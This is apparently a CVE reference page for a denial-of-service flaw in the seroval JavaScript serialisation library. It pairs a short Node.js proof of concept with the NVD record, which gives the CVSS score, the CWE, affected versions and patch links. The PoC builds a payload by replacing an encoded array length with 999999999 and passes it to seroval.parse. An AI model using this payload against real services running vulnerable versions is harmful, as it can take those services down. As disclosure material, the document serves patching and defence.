CVE-2026-23957

// CVE-2026-23957 PoC - Denial of Service via oversized array length const seroval = require('seroval'); // Create a normal object and serialize it const normalData = { items: [1, 2, 3] }; const serialized = seroval.stringify(normalData); console.log('Normal serialized:', serialized); // Malicious payload: Override array length with a huge value // The serialized format contains length information that can be tampered // Example: replacing array length '3' with a very large number like '999999999' const maliciousPayload = serialized.replace(/:3]/g, ':999999999]'); console.log('Malicious payload:', maliciousPayload); // Attempt to deserialize the malicious payload - triggers DoS try { const startTime = Date.now(); const result = seroval.parse(maliciousPayload); const endTime = Date.now(); console.log('Processing time:', endTime - startTime, 'ms'); } catch (error) { console.log('Error occurred:', error.message); } // Note: This causes significant processing delay due to oversized array allocation

{"cve": {"id": "CVE-2026-23957", "sourceIdentifier": "[email protected]", "published": "2026-01-22T02:15:52.470", "lastModified": "2026-04-06T13:51:20.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "seroval facilitates JS value stringification, including complex structures beyond JSON.stringify capabilities. In versions 1.4.0\nand below, overriding encoded array lengths by replacing them with an excessively large value causes the deserialization process to significantly increase processing time. This issue has been fixed in version 1.4.1."}, {"lang": "es", "value": "seroval facilita la serialización de valores JS, incluyendo estructuras complejas más allá de las capacidades de JSON.stringify. En las versiones 1.4.0 e inferiores, la anulación de las longitudes de arrays codificados al reemplazarlas con un valor excesivamente grande provoca que el proceso de deserialización aumente significativamente el tiempo de procesamiento. Este problema ha sido solucionado en la versión 1.4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lxsmnsyc:seroval:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "1.4.1", "matchCriteriaId": "85760E40-9AB1-40EB-98A1-D1A4411AAFC5"}]}]}], "references": [{"url": "https://github.com/lxsmnsyc/seroval/commit/ce9408ebc87312fcad345a73c172212f2a798060", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/lxsmnsyc/seroval/security/advisories/GHSA-66fc-rw6m-c2q6", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}